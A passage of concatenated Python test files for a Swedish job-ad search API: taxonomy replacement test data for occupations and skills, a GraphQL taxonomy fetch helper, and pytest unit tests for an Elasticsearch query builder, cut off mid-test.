{'new_label': 'Butikskommunikatör/Visual merchandiser', 'replaced_by': 'GTFy_iPM_msj',
'old_replaced': ['JGxJ_pEB_yre'], 'hits': []},
{'new_label': 'Fartygsagent/Fartygsklarerare', 'replaced_by': 'eXwZ_gVJ_39q',
'old_replaced': ['ybqj_FXq_K98'], 'hits': []},
{'new_label': 'Dansare', 'replaced_by': 'euJP_wxo_skF', 'old_replaced': ['saUi_aP6_zhU'],
'hits': []},
{'new_label': 'Skolchef/Skoldirektör/Skolledare', 'replaced_by': 'j6P1_gJq_a2Q',
'old_replaced': ['zHkF_Yg1_PTS', 'MopY_AvK_MmE'], 'hits': ['24575721', '24569099']},
{'new_label': 'Nationalekonom', 'replaced_by': 'ef1m_sEu_ok6', 'old_replaced': ['Cq7H_YYS_aQH'],
'hits': ['24606305']},
{'new_label': 'Forskare, jordbruk', 'replaced_by': 'oRBx_v9Q_vH2',
'old_replaced': ['cCYi_JUn_K8P'],
'hits': []},
{'new_label': 'Elkraftingenjör', 'replaced_by': '7Yn2_NLJ_oa2',
'old_replaced': ['1hZc_5BC_K7q', 'g7UK_FUb_nxf', 'PMx8_n1G_fPx', 'Eo4y_EGW_KVM',
'aWNX_iEg_NhN',
'Kh3N_Kg8_KK5'],
'hits': ['24645107', '24602558', '24572890', '24512446', '24507851', '24445999']},
{'new_label': 'Parkeringsvakt/Trafikövervakare', 'replaced_by': 'rfpp_bnQ_RoQ',
'old_replaced': ['44uM_XPP_VdK'], 'hits': []},
{'new_label': 'Butikschef', 'replaced_by': 'WWVG_4sM_faC', 'old_replaced': ['yjaM_pAe_u9m'],
'hits': ['24644601', '24639242', '24636959', '24632618', '24627262', '24625609', '24611376',
'24607526',
'24605640', '24594836']},
{'new_label': 'Abonnemangsförsäljare', 'replaced_by': 'aoUt_f9s_rAk',
'old_replaced': ['4xEL_DVf_rNV'],
'hits': ['24648147', '24648032', '24647914', '24647866', '24645321', '24645317', '24643210',
'24643150',
'24643147', '24639915']},
{'new_label': 'Tågvärd/Tågvärdinna', 'replaced_by': 'KMRG_Bda_5CV',
'old_replaced': ['tnaT_rPT_RXj'],
'hits': []},
{'new_label': 'Modejournalistik', 'replaced_by': 'LyVp_zhc_czS',
'old_replaced': ['vHbJ_BUC_xDW'],
'hits': []},
{'new_label': 'Mästarbrev, broderi/konstbroderi', 'replaced_by': 'TJ8G_gZg_5tL',
'old_replaced': ['1iPF_7Cg_zUm'], 'hits': []},
{'new_label': 'Demograf', 'replaced_by': 'GX5o_8RD_rxJ', 'old_replaced': ['D7tB_NxQ_ZWN'],
'hits': []},
{'new_label': 'Prepressoperatör', 'replaced_by': 'gUu8_FXb_qCv',
'old_replaced': ['CWK4_8NM_4YY', 'mL3G_SKE_mab'], 'hits': []},
{'new_label': 'TV-fotograf', 'replaced_by': 'JfyC_gDr_U4e', 'old_replaced': ['E9Fm_7C2_uYU'],
'hits': []},
{'new_label': 'Musiker', 'replaced_by': 'UCXb_LjK_pHv',
'old_replaced': ['7fB3_Ckh_NuC', 'aR3a_5Ly_TDw'],
'hits': ['24531845']},
{'new_label': 'Familjerättssekreterare', 'replaced_by': 'dBVw_5Cw_upG',
'old_replaced': ['KgMS_ENm_V7z'],
'hits': []},
{'new_label': 'Laboratoriebiträde', 'replaced_by': 'sghA_68W_sYw',
'old_replaced': ['Hv4J_UHc_s7M', 'Ttbo_P3H_C4V', 'AWpr_8U2_32J'], 'hits': []},
{'new_label': 'Forskare, trädgårdsvetenskap', 'replaced_by': 'Co7T_yKa_Zb1',
'old_replaced': ['5bp9_eBL_BPF'], 'hits': []},
{'new_label': 'Revisorsassistent', 'replaced_by': 'Bbpr_AMz_nzt',
'old_replaced': ['7rct_y2Q_NSe'],
'hits': ['24612654', '24591386', '24549608']},
{'new_label': 'Forskare, språk', 'replaced_by': 'WrM5_fTS_37j',
'old_replaced': ['DCMR_H5T_4Nk'],
'hits': []},
{'new_label': 'Utbildningsadministratör/Utbildningssekreterare/Kursadministratör',
'replaced_by': 'QUmN_cfC_zPn',
'old_replaced': ['sbKP_NHi_eiv', 'JPtk_3q6_xBL', '1jLm_pkS_3BX'],
'hits': ['24649356', '24647010']},
{'new_label': 'Helpdesktekniker/Supporttekniker', 'replaced_by': 'KQty_E1u_cia',
'old_replaced': ['4zNH_ukk_cEn'],
'hits': ['24647864', '24645367', '24642579', '24641101', '24639693', '24638483', '24636316',
'24636297',
'24634219', '24632405']},
{'new_label': 'Kommunchef/Kommundirektör/Stadsdirektör', 'replaced_by': 'dRXp_E2C_Lq9',
'old_replaced': ['fdZE_y62_wdE', '7yzW_dCg_7s7'], 'hits': ['24648307']},
{'new_label': 'Mediatextare', 'replaced_by': 'S2QW_12u_Pj1',
'old_replaced': ['RSra_C73_mJe', 'HcpH_1h7_vkK', 'PM4A_xoG_hQD'], 'hits': []},
{'new_label': 'Ekonomichef', 'replaced_by': 'iCy6_G72_abh', 'old_replaced': ['nHFx_RFe_giS'],
'hits': ['24650582', '24625929', '24624351', '24616138', '24615771', '24610880']},
{'new_label': 'Stadsbyggnadschef/Stadsbyggnadsdirektör', 'replaced_by': 'DWv2_Yu9_yo6',
'old_replaced': ['noSX_WNd_Nxv'], 'hits': []},
{'new_label': 'Fastighetschef/Fastighetsdirektör', 'replaced_by': 'wUKi_LRW_Wxk',
'old_replaced': ['7J2i_94b_ow4'], 'hits': ['24643005', '24632701', '24596320']},
{'new_label': 'Estetiska programmet, undervisning', 'replaced_by': 'HUBG_Mz2_X1G',
'old_replaced': ['EL4A_hSn_JYx'], 'hits': []},
{'new_label': 'Annonsmottagare', 'replaced_by': 'p3m5_Ndd_6im',
'old_replaced': ['7Zx9_BVE_Qna', 'zKqM_a5a_29j'], 'hits': []},
{'new_label': 'Ekonomiföreståndare/Kursgårdsföreståndare/Storhushållsföreståndare',
'replaced_by': 'ATAp_LN5_BPU',
'old_replaced': ['VCsj_Uve_6EJ', 'sqJi_voF_eaR', 'aCbh_uAN_6th'],
'hits': ['24647491']},
{'new_label': 'Inspicient', 'replaced_by': 'Zjz2_R2c_ySs',
'old_replaced': ['Sdc8_zgb_WFe', 'NBpU_vTR_B6S'], 'hits': []},
{'new_label': 'Badföreståndare/Simhallsföreståndare', 'replaced_by': 'q6mQ_fnc_A9Y',
'old_replaced': ['gE2Y_BMR_Dpq'], 'hits': []},
{'new_label': 'Miljöingenjör/Miljövårdsingenjör', 'replaced_by': 'vUZt_BHY_mk2',
'old_replaced': ['MLPW_mLu_d7K'], 'hits': ['24643524']},
{'new_label': 'Idrottskonsulent', 'replaced_by': 'M7TY_sct_XPk',
'old_replaced': ['hJuL_n8p_UEM'],
'hits': ['24641526']},
{'new_label': 'Underhållsanalytiker, elkraft', 'replaced_by': 'Yyn9_wQV_Wb8',
'old_replaced': ['4QjK_RpG_h4w'], 'hits': ['24637940', '24509354']},
{'new_label': 'Civilingenjör, elkraft', 'replaced_by': 'FuJx_cGT_5im',
'old_replaced': ['P2bU_f8o_Lkw', 'v5nC_xX1_Y7U', 'D3M6_p8P_jdD', '4i7D_pQL_DNa',
'WhsT_BWb_dPy',
'GtGP_PiD_yRc'], 'hits': ['24632281', '24622759', '24573532']},
{'new_label': 'Förhandlingschef', 'replaced_by': 'JZgY_jHa_Uwa',
'old_replaced': ['1oCZ_J6h_rGV'],
'hits': []},
{'new_label': 'Dataregistrerare/Registrerare', 'replaced_by': 'jqVE_Ux3_VMN',
'old_replaced': ['nrya_iNN_6BR'], 'hits': []},
{'new_label': 'Originalare/Final Art', 'replaced_by': 'SxqC_BSK_D3u',
'old_replaced': ['AfoB_XP5_5Ak'],
'hits': []},
{'new_label': 'Beredskapsdirektör', 'replaced_by': 'cB4Q_Cx9_2Lw',
'old_replaced': ['ohrC_dLP_3ad'],
'hits': []},
{'new_label': 'Stadsjurist/Kommunjurist/Stadsadvokat', 'replaced_by': 'iRUx_bBB_Vmp',
'old_replaced': ['kZAz_CaQ_zhN', 'Cbq1_SZq_WQJ'], 'hits': []},
{'new_label': 'Komminister', 'replaced_by': 'jQKk_Wzd_pvu', 'old_replaced': ['memm_eLn_j1a'],
'hits': []},
{'new_label': 'Kvalitetssamordnare/Kvalitetskoordinator', 'replaced_by': 'hQtr_vwy_MGb',
'old_replaced': ['d2gz_es2_pX5'],
'hits': ['24647020', '24646953', '24646081', '24643688', '24640405', '24634573', '24616132',
'24610804',
'24576129', '24514986']},
{'new_label': 'Producent: kultur, media, film, dataspel', 'replaced_by': 'FcaP_vhz_Cuy',
'old_replaced': ['qV9q_oKv_QzL', 'Jsct_XQW_U8u', '5GaR_6HQ_8vY', 'XSoL_LLU_PYV',
'wiGD_eu2_UJV'],
'hits': ['24625448', '24499240']},
{'new_label': 'Spabehandling', 'replaced_by': 'vHaL_11u_eEi', 'old_replaced': ['SENm_xRv_P3b'],
'hits': []},
{'new_label': 'Invandrarkonsulent', 'replaced_by': '7yB4_npo_55m',
'old_replaced': ['X4vv_yJ8_Nx1'],
'hits': []},
{'new_label': 'Aktuarie/Försäkringsaktuarie/Försäkringsmatematiker',
'replaced_by': 's9UN_r5w_c5K',
'old_replaced': ['cUKA_xwQ_VWk', 'AJSy_PSb_tLY'], 'hits': []},
{'new_label': 'Verkställande direktör/VD', 'replaced_by': 'nvUH_JLD_s4F',
'old_replaced': ['dh7h_HbH_Cus'],
'hits': ['24638242', '24516982']},
{'new_label': 'Ombudsman', 'replaced_by': '7YVF_kE4_aPm',
'old_replaced': ['etPa_VHn_mrt', 'YHB5_wmX_UCt', '33CY_8xp_U24', '4pdy_hXe_krp',
'Qf5a_Awb_Xr1',
'6qFX_Cmu_o5U', 'nr69_xvF_c4f'],
'hits': ['24681267', '24681265', '24681247', '24676773', '24625395']},
{'new_label': 'Databasadministratör', 'replaced_by': 'y763_SQh_71J',
'old_replaced': ['4L63_HPx_7uh'],
'hits': ['24635989', '24632433']},
{'new_label': 'Medicinteknisk ingenjör', 'replaced_by': 'nGhq_Pjm_az5',
'old_replaced': ['NNtF_PrM_erv', 'UFCb_3sj_MET'],
'hits': ['24615799', '24608421', '24591934', '24434389']},
{'new_label': 'Linjeagent/Rederiagent', 'replaced_by': 'zthE_Zb1_tjb',
'old_replaced': ['7oc6_8Rs_fAv'],
'hits': []},
{'new_label': 'Interaktionsdesigner', 'replaced_by': 'QQjZ_NAN_bDR',
'old_replaced': ['MGBV_LVk_AtK', 'HciA_Cu7_FXt'],
'hits': ['24647065', '24646521', '24646322', '24632584', '24520622', '24527159', '24527152']},
{'new_label': 'Showartist', 'replaced_by': 'RsYS_Mkj_kd1', 'old_replaced': ['46tq_qty_Lqm'],
'hits': []},
{'new_label': 'Bostadsförmedlare', 'replaced_by': 'WL4K_4RF_NEJ',
'old_replaced': ['ssNi_aPV_7o3'],
'hits': []},
{'new_label': 'Dietist', 'replaced_by': 'C1FR_RzT_hzP',
'old_replaced': ['Zkke_bJ1_Edq', 'pp29_K2N_aDY'],
'hits': ['24641238', '24641268', '24626434', '24614914', '24581751']},
{'new_label': 'Familjebehandlare/Familjepedagog', 'replaced_by': 'Fr7W_Yjv_3ik',
'old_replaced': ['TChs_6ci_gJQ'], 'hits': ['24573516']},
{'new_label': 'Psykodynamisk psykoterapi', 'replaced_by': 'ZnGd_a1m_2Fi',
'old_replaced': ['omTo_PiA_RX6'],
'hits': []},
{'new_label': 'Administratör/Administrativ assistent', 'replaced_by': 's5pR_WNm_R8W',
'old_replaced': ['T9MX_dmQ_t5n', 'Dgx7_yw6_CaN', 'tNy7_bJc_8FS', 'GiV1_hMx_qUT'],
'hits': ['24650971', '24650060', '24647704', '24647256', '24646256', '24645598', '24642483',
'24641459',
'24636981', '24636522']},
{'new_label': 'Inköpsassistent/Inköpskontorist/Inköpssekreterare',
'replaced_by': 'W8Kb_rxf_uRQ',
'old_replaced': ['t4QA_LXF_Z3T', '2YDV_mGq_LpN', 'ZyDH_2Xe_bfK'],
'hits': ['24647760', '24647703', '24635648', '24620172', '24619248']},
{'new_label': 'Gesällbrev, broderi/konstbroderi', 'replaced_by': 'EmPd_sYg_gz3',
'old_replaced': ['QGSv_ngN_iA9'], 'hits': []},
{'new_label': 'Bildingenjör/BING, film/BING, TV', 'replaced_by': 'm8ED_BbT_twk',
'old_replaced': ['t2pX_4bB_xCG'], 'hits': []},
{'new_label': 'Sjuksköterska, geriatrik/Sjuksköterska, äldreomsorg och äldrevård',
'replaced_by': 'uaJs_9YA_Cnp', 'old_replaced': ['kHno_7rL_Lcm'],
'hits': ['24646122', '24646015', '24643631', '24641581', '24637517', '24633039', '24619737',
'24610664',
'24607356', '24605037']},
{'new_label': 'Försäljningsassistent/Försäljningssekreterare', 'replaced_by': 'HFuj_YCt_Ymn',
'old_replaced': ['mXSF_yMY_ppH', 'NikA_KEh_Ky4', 'AfxM_9dB_xbC'],
'hits': ['24649654', '24647299', '24643212', '24603457']},
{'new_label': 'Badmästare/Badbevakare/Badvakt/Simhallsvakt/Strandvakt',
'replaced_by': 'BbNn_Gtf_rKp',
'old_replaced': ['kf7K_UAZ_ed8', 'YXm8_rp9_1Sv', 'wFPP_zmg_PK4', 'qtPc_BJB_SYL'],
'hits': ['24645272', '24572488', '24552904']},
{'new_label': 'Kontrollanläggningsingenjör, elkraft', 'replaced_by': 'fYBk_dfW_DJc',
'old_replaced': ['Be1K_Dp4_DrD'], 'hits': []},
{'new_label': 'Tandtekniker', 'replaced_by': '9fEz_9ji_74Y', 'old_replaced': ['EEN6_NCm_XgJ'],
'hits': ['24553091']},
{'new_label': 'Reklamassistent/Reklamsekreterare', 'replaced_by': 'XYoM_UCq_923',
'old_replaced': ['7jaj_Pej_27m'], 'hits': []},
{'new_label': 'Kanslichef', 'replaced_by': 'V74g_m5Z_BtM',
'old_replaced': ['2DB2_o9K_sMy', 'KhbC_P4c_R82', 'Uoeq_F5q_18w'], 'hits': ['24646965']},
{'new_label': 'Kontrollanläggningstekniker', 'replaced_by': 'iXyv_E2W_cqc',
'old_replaced': ['TppD_R5Y_kiG', 'cJ62_FKk_ua6'],
'hits': ['24641497', '24623380', '24623314']},
{'new_label': 'Flight Data Operator/FDO/Flygledarassistent', 'replaced_by': 'WUxP_1ih_6RG',
'old_replaced': ['UjqL_rhp_jC4'], 'hits': []},
{'new_label': 'CAD-konstruktion/CAD-ritning', 'replaced_by': 'oaiv_GsB_AFK',
'old_replaced': ['AbDo_gbm_f46'], 'hits': []},
{'new_label': 'Trafiklärare', 'replaced_by': 'hERw_LKk_uJK', 'old_replaced': ['3vQv_E4Q_wjK'],
'hits': ['24648390', '24604479', '24618870', '24603183', '24596067', '24585890', '24534821',
'24478339']},
{'new_label': 'Sportjournalistik', 'replaced_by': '5AdH_yyr_MPW',
'old_replaced': ['QU9n_VJq_kYo'],
'hits': []},
{'new_label': 'HR-assistent', 'replaced_by': 'ofiS_5F2_YmV',
'old_replaced': ['1reZ_8Q1_nwY', '1zns_dXR_NMQ', '9wyj_ibD_Yo1'],
'hits': ['24646439', '24643526', '24617892']},
{'new_label': 'Redigerare, rörlig bild', 'replaced_by': 'K1k3_ZHN_PTh',
'old_replaced': ['7pvW_ATp_bnx', 'N9fQ_uJ4_1vB'], 'hits': []},
{'new_label': 'Arbetsledare, städ/Husfru/Städledare', 'replaced_by': 'cYP6_Tur_q6m',
'old_replaced': ['Yx7u_AbE_Jqk'], 'hits': ['24648781', '24638880', '24633176']},
{'new_label': 'Revisor', 'replaced_by': 'jwgi_jYc_iE9',
'old_replaced': ['fo9m_5cC_y8G', 'mNBw_Znj_4eJ', 'SR8Z_ESt_FfC', 'kNQH_LXD_eLe',
'twUU_T1n_hW5',
'7ava_ohk_66H'],
'hits': ['24622718', '24613082', '24607178', '24594452', '24565317', '24530121']},
{'new_label': 'Socialchef/Socialdirektör', 'replaced_by': 'jn3U_UTt_PUJ',
'old_replaced': ['Qgmk_7Xb_z4q'],
'hits': []},
{'new_label': 'Platschef, bygg', 'replaced_by': 'NZcr_uB1_6rX',
'old_replaced': ['5Nkq_7DE_hoo'],
'hits': ['24638307', '24631557', '24608211', '24604812', '24471798']},
{'new_label': 'Personaladministratör', 'replaced_by': 'MbHj_ZVr_WsC',
'old_replaced': ['geo3_qtw_3eP'],
'hits': ['24649818', '24645687', '24629870', '24618830', '24574415', '24572733']},
]
test_data_skills = [
{'new_label': 'Kognitiv psykoterapi', 'replaced_by': 'bhp9_3YQ_YMH', 'old_replaced': ['zDPA_vcC_GqY'], 'hits': []},
{'new_label': 'Psykodynamisk psykoterapi', 'replaced_by': 'ZnGd_a1m_2Fi', 'old_replaced': ['omTo_PiA_RX6'],
'hits': []},
{'new_label': 'B - Begränsad auktorisation', 'replaced_by': '4mNF_7vZ_vCx', 'old_replaced': ['dcYP_eMq_xNY'],
'hits': ['24633518']},
{'new_label': 'Prepressarbete', 'replaced_by': '8ntq_a4w_7mH',
'old_replaced': ['fvXQ_LWU_T8z', 'EQQL_1YJ_JVX', 'NBXw_2xF_89L', 'fUzi_DwE_dMu', '2X76_itb_csw', '16sV_pbX_iED',
'UW8w_CQg_a9V', '2nAr_Bhe_vda'], 'hits': []},
{'new_label': 'Prepressarbete', 'replaced_by': '8ntq_a4w_7mH',
'old_replaced': ['fvXQ_LWU_T8z', 'EQQL_1YJ_JVX', 'NBXw_2xF_89L', 'fUzi_DwE_dMu', '2X76_itb_csw', '16sV_pbX_iED',
'UW8w_CQg_a9V', '2nAr_Bhe_vda'], 'hits': []},
{'new_label': 'Prepressarbete', 'replaced_by': '8ntq_a4w_7mH',
'old_replaced': ['fvXQ_LWU_T8z', 'EQQL_1YJ_JVX', 'NBXw_2xF_89L', 'fUzi_DwE_dMu', '2X76_itb_csw', '16sV_pbX_iED',
'UW8w_CQg_a9V', '2nAr_Bhe_vda'], 'hits': []},
{'new_label': 'Prepressarbete', 'replaced_by': '8ntq_a4w_7mH',
'old_replaced': ['fvXQ_LWU_T8z', 'EQQL_1YJ_JVX', 'NBXw_2xF_89L', 'fUzi_DwE_dMu', '2X76_itb_csw', '16sV_pbX_iED',
'UW8w_CQg_a9V', '2nAr_Bhe_vda'], 'hits': []},
{'new_label': 'Prepressarbete', 'replaced_by': '8ntq_a4w_7mH',
'old_replaced': ['fvXQ_LWU_T8z', 'EQQL_1YJ_JVX', 'NBXw_2xF_89L', 'fUzi_DwE_dMu', '2X76_itb_csw', '16sV_pbX_iED',
'UW8w_CQg_a9V', '2nAr_Bhe_vda'], 'hits': []},
{'new_label': 'Prepressarbete', 'replaced_by': '8ntq_a4w_7mH',
'old_replaced': ['fvXQ_LWU_T8z', 'EQQL_1YJ_JVX', 'NBXw_2xF_89L', 'fUzi_DwE_dMu', '2X76_itb_csw', '16sV_pbX_iED',
'UW8w_CQg_a9V', '2nAr_Bhe_vda'], 'hits': []},
{'new_label': 'Prepressarbete', 'replaced_by': '8ntq_a4w_7mH',
'old_replaced': ['fvXQ_LWU_T8z', 'EQQL_1YJ_JVX', 'NBXw_2xF_89L', 'fUzi_DwE_dMu', '2X76_itb_csw', '16sV_pbX_iED',
'UW8w_CQg_a9V', '2nAr_Bhe_vda'], 'hits': []},
{'new_label': 'Prepressarbete', 'replaced_by': '8ntq_a4w_7mH',
'old_replaced': ['fvXQ_LWU_T8z', 'EQQL_1YJ_JVX', 'NBXw_2xF_89L', 'fUzi_DwE_dMu', '2X76_itb_csw', '16sV_pbX_iED',
'UW8w_CQg_a9V', '2nAr_Bhe_vda'], 'hits': []},
{'new_label': 'Estetiska programmet, undervisning', 'replaced_by': 'HUBG_Mz2_X1G', 'old_replaced': ['EL4A_hSn_JYx'],
'hits': []},
{'new_label': 'CAD-konstruktion/CAD-ritning', 'replaced_by': 'oaiv_GsB_AFK', 'old_replaced': ['AbDo_gbm_f46'],
'hits': []},
{'new_label': 'Sportjournalistik', 'replaced_by': '5AdH_yyr_MPW', 'old_replaced': ['QU9n_VJq_kYo'], 'hits': []},
{'new_label': 'Modejournalistik', 'replaced_by': 'LyVp_zhc_czS', 'old_replaced': ['vHbJ_BUC_xDW'], 'hits': []},
{'new_label': 'Spabehandling', 'replaced_by': 'vHaL_11u_eEi', 'old_replaced': ['SENm_xRv_P3b'], 'hits': []},
{'new_label': 'Mästarbrev, broderi/konstbroderi', 'replaced_by': 'TJ8G_gZg_5tL', 'old_replaced': ['1iPF_7Cg_zUm'],
'hits': []},
{'new_label': 'Gesällbrev, broderi/konstbroderi', 'replaced_by': 'EmPd_sYg_gz3', 'old_replaced': ['QGSv_ngN_iA9'],
'hits': []},
]
def test_same_hits():
for item in test_data_occupation:
hits_for_replaced_by = item['hits_for_replaced_by']
for entry in item['old_with_hits']:
            if not sorted(hits_for_replaced_by) == sorted(entry['hits_for_old']):
print()
def test_format():
for item in test_data_occupation:
tmp = {'new_label': item['new_label'],
'replaced_by': item['replaced_by'],
'old_replaced': item['old_replaced'],
'hits': item['hits_for_replaced_by'],
}
print(f"{tmp},")
def test_2():
for item in test_data_occupation:
if item['hits_for_replaced_by']:
print()
```
#### File: tests/test_resources/get_occupation_collections.py
```python
import logging
import requests
from common import settings
log = logging.getLogger(__name__)
TAXONOMY_GRAPHQL_URL = f"{settings.BASE_TAXONOMY_URL}graphql?"
def _fetch_taxonomy_values(params):
headers = {"api-key": settings.TAXONOMY_APIKEY}
taxonomy_response = requests.get(url=TAXONOMY_GRAPHQL_URL, headers=headers, params=params)
taxonomy_response.raise_for_status()
return taxonomy_response.json()
def _fetch_value(query):
params = {'query': query}
response = _fetch_taxonomy_values(params)
values = response.get('data', {}).get('concepts', [])
return values
occupation_collection_query = """query collections {
concepts(type: "occupation-collection") {
id
related {
id
}
}
}"""
def get_occupation_collections():
return _fetch_value(occupation_collection_query)
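# --- Added usage sketch (assumption: not part of the original file; it needs a
# reachable Taxonomy instance via settings.BASE_TAXONOMY_URL / TAXONOMY_APIKEY).
# Each returned item follows the GraphQL query above, e.g.
# {'id': '<collection concept id>', 'related': [{'id': '<occupation concept id>'}, ...]}
if __name__ == "__main__":
    collections = get_occupation_collections()
    print(f"fetched {len(collections)} occupation collections")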
```
#### File: tests/test_resources/historical.py
```python
from tests.test_resources.helper import compare_two_lists
all_keys = ['occupation-name', 'occupation-group', 'occupation-field', 'employment-type', 'country', 'region',
'municipality', 'language', 'skill']
all_stats = ['occupation-name', 'occupation-group', 'municipality', 'region', 'country']
default_values = 10
def compare_keys(stats):
keys = []
for item in stats:
keys.append(item)
compare_two_lists(keys, all_keys)
def check_default_values(stats):
for key, value in stats.items():
expected = 10 # default
if key == 'employment-type':
expected = 6
assert len(value) == expected
expected_top_values = {
'occupation': 392,
'occupation_group': 396,
'occupation_field': 971,
'employment_type': 4389,
'country': 4999,
'region': 1227,
'municipality': 775,
'language': 490,
'skill': 23}
```
#### File: tests/unit_tests/test_querybuilder.py
```python
import datetime
import pytest
import json
from common import settings, taxonomy
from tests.unit_tests.test_resources.mock_for_querybuilder_tests import all_query_builders, mock_querybuilder_jobsearch
from sokannonser.repository.querybuilder import QueryBuilder
from tests.test_resources.helper import is_dst
# this will run unit tests whenever api or integration tests are run, or when only unit tests are selected for test
from tests.unit_tests.test_resources.qb_helper import _assert_json_structure
pytestmark = pytest.mark.unit
@pytest.mark.parametrize("word, expected", [
('"stockholm', '\\"stockholm'),
('v]rg]rda', 'v\\]rg\\]rda'),
])
def test_check_search_word_type_nar_862_and_1107(word, expected):
"""
Checking that special chars are properly escaped for Elastic
when checking search word type, before suggest_extra_word(),
for /complete endpoint
"""
query = json.loads(QueryBuilder.create_check_search_word_type_query(word))
assert query['aggs']['search_type_location']['terms']['include'] == expected
def test_parse_args_query_with_slash():
args = {'x-feature-freetext-bool-method': 'and', 'x-feature-disable-smart-freetext': None,
'x-feature-enable-false-negative': None, 'published-before': None, 'published-after': None,
'occupation-name': None, 'occupation-group': None, 'occupation-field': None, 'occupation-collection': None,
'skill': None, 'language': None, 'worktime-extent': None, 'parttime.min': None, 'parttime.max': None,
'driving-license-required': None, 'driving-license': None, 'employment-type': None, 'experience': None,
'municipality': None, 'region': None, 'country': None, 'unspecified-sweden-workplace': None, 'abroad': None,
'position': None, 'position.radius': None, 'employer': None, 'q': 'systemutvecklare/programmerare',
'qfields': None, 'relevance-threshold': None, 'sort': None, 'stats': None, 'stats.limit': None}
expected_time = 'now+2H/m' if is_dst() else 'now+1H/m' # f"{expected_time}"
expected_query_dsl = \
{
'from': 0, 'size': 10, 'track_total_hits': True, 'track_scores': True, 'query': {'bool': {
'must': [{'bool': {'must': [{'bool': {'should': [{'multi_match': {'query': 'systemutvecklare/programmerare',
'type': 'cross_fields', 'operator': 'and',
'fields': ['headline^3',
'keywords.extracted.employer^2',
'description.text', 'id',
'external_id', 'source_type',
'keywords.extracted.location^5']}},
{'match': {'headline.words': {
'query': 'systemutvecklare/programmerare',
'operator': 'and', 'boost': 5}}}]}}]}}],
'filter': [{'range': {'publication_date': {'lte': f"{expected_time}"}}},
{'range': {'last_publication_date': {'gte': f"{expected_time}"}}},
{'term': {'removed': False}}]}},
'aggs': {'positions': {'sum': {'field': 'number_of_vacancies'}}},
'sort': ['_score', {'publication_date': 'desc'}]
}
assert mock_querybuilder_jobsearch.parse_args(args) == expected_query_dsl
def current_month_and_day():
now = datetime.datetime.now()
current_month = now.strftime('%m')
current_day = now.strftime('%d')
return current_month, current_day
@pytest.mark.parametrize("mock_query_builder", all_query_builders)
@pytest.mark.parametrize("args, exist, expected",
[({settings.APIKEY: "",
settings.POSITION: ["66.6, 77.7"],
settings.POSITION_RADIUS: [5]},
True,
{"bool": {
"should":
[{"geo_distance": {
"distance": "5km",
"workplace_address.coordinates":
[77.7, 66.6]}}]}}),
({settings.APIKEY: "",
settings.POSITION: ["66.6, 180.1"],
settings.POSITION_RADIUS: [5]},
False,
{"bool": {
"should":
[{"geo_distance": {
"distance": "5km",
"workplace_address.coordinates":
[180.1, 66.6]}}]}}),
({settings.APIKEY: "",
settings.POSITION: ["66.6, 77.7"],
settings.POSITION_RADIUS: [-5]},
False,
{"bool": {
"should":
[{"geo_distance": {
"distance": "-5km",
"workplace_address.coordinates": [
77.7, 66.6
]}}]}}),
({settings.APIKEY: "",
settings.POSITION: ["66.6, 77.7", "59.1, 18.1"],
settings.POSITION_RADIUS: [5, 10]},
True,
{"bool": {
"should":
[{"geo_distance": {
"distance": "5km",
"workplace_address.coordinates": [
77.7, 66.6
]}},
{"geo_distance": {
"distance": "10km",
"workplace_address.coordinates": [
18.1, 59.1
]
}}]
}}),
({settings.APIKEY: "",
settings.POSITION: ["66.6, 77.7", "59.1, 18.1"],
settings.POSITION_RADIUS: [5, 10, 15]},
True,
{"bool": {
"should":
[{"geo_distance": {
"distance": "5km",
"workplace_address.coordinates": [
77.7, 66.6
]}},
{"geo_distance": {
"distance": "10km",
"workplace_address.coordinates": [
18.1, 59.1
]
}}]
}}),
({settings.APIKEY: "",
settings.POSITION: ["66.6, 77.7", "59.1, 18.1"],
settings.POSITION_RADIUS: [10]},
True,
{"bool": {
"should":
[{"geo_distance": {
"distance": "10km",
"workplace_address.coordinates": [
77.7, 66.6
]}},
{"geo_distance": {
"distance": "5km",
"workplace_address.coordinates": [
18.1, 59.1
]
}}]
}}),
({settings.APIKEY: "",
settings.POSITION: ["66.6, 77.7", "59.1, 18.1"]},
True,
{"bool": {
"should":
[{"geo_distance": {
"distance": "5km",
"workplace_address.coordinates": [
77.7, 66.6
]}},
{"geo_distance": {
"distance": "5km",
"workplace_address.coordinates": [
18.1, 59.1
]
}}]
}})])
def test_geo_distance_filter(args, exist, expected, mock_query_builder):
query_dsl = mock_query_builder.parse_args(args)
assert (expected in query_dsl["query"]["bool"]["filter"]) == exist
@pytest.mark.parametrize("mock_query_builder", all_query_builders)
@pytest.mark.parametrize("args, expected_pos, expected_neg",
[({settings.APIKEY: "",
taxonomy.REGION: ["01", "02"]},
[
{"term": {"workplace_address.region_code": {"value": "01", "boost": 1.0}}},
{"term": {"workplace_address.region_code": {"value": "02", "boost": 1.0}}},
{"term": {"workplace_address.region_concept_id": {"value": "01", "boost": 1.0}}},
{"term": {"workplace_address.region_concept_id": {"value": "02", "boost": 1.0}}}
],
[]),
({settings.APIKEY: "",
taxonomy.MUNICIPALITY: ["0111"]},
[
{"term": {"workplace_address.municipality_code": {"value": "0111", "boost": 2.0}}},
{"term": {
"workplace_address.municipality_concept_id": {"value": "0111", "boost": 2.0}}}
],
[]),
({settings.APIKEY: "",
taxonomy.REGION: ["01", "02"],
taxonomy.MUNICIPALITY: ["1111", "2222"]},
[
{"term": {"workplace_address.region_code": {"value": "01", "boost": 1.0}}},
{"term": {"workplace_address.region_code": {"value": "02", "boost": 1.0}}},
{"term": {"workplace_address.region_concept_id": {"value": "01", "boost": 1.0}}},
{"term": {"workplace_address.region_concept_id": {"value": "02", "boost": 1.0}}},
{"term": {"workplace_address.municipality_code": {"value": "1111", "boost": 2.0}}},
{"term": {"workplace_address.municipality_code": {"value": "2222", "boost": 2.0}}},
{"term": {
"workplace_address.municipality_concept_id":
{"value": "1111", "boost": 2.0}}},
{"term": {
"workplace_address.municipality_concept_id":
{"value": "2222", "boost": 2.0}}}
],
[]),
({settings.APIKEY: "",
taxonomy.REGION: ["01", "-02"],
taxonomy.MUNICIPALITY: ["1111", "-2222"]},
[
{"term": {"workplace_address.region_code": {"value": "01", "boost": 1.0}}},
{"term": {"workplace_address.municipality_code": {"value": "1111", "boost": 2.0}}},
{"term": {"workplace_address.region_code": {"value": "01", "boost": 1.0}}},
{"term": {"workplace_address.municipality_code": {"value": "1111", "boost": 2.0}}}
],
[
{"term": {"workplace_address.region_code": {"value": "02"}}},
{"term": {"workplace_address.municipality_code": {"value": "2222"}}},
{"term": {"workplace_address.region_concept_id": {"value": "02"}}},
{"term": {
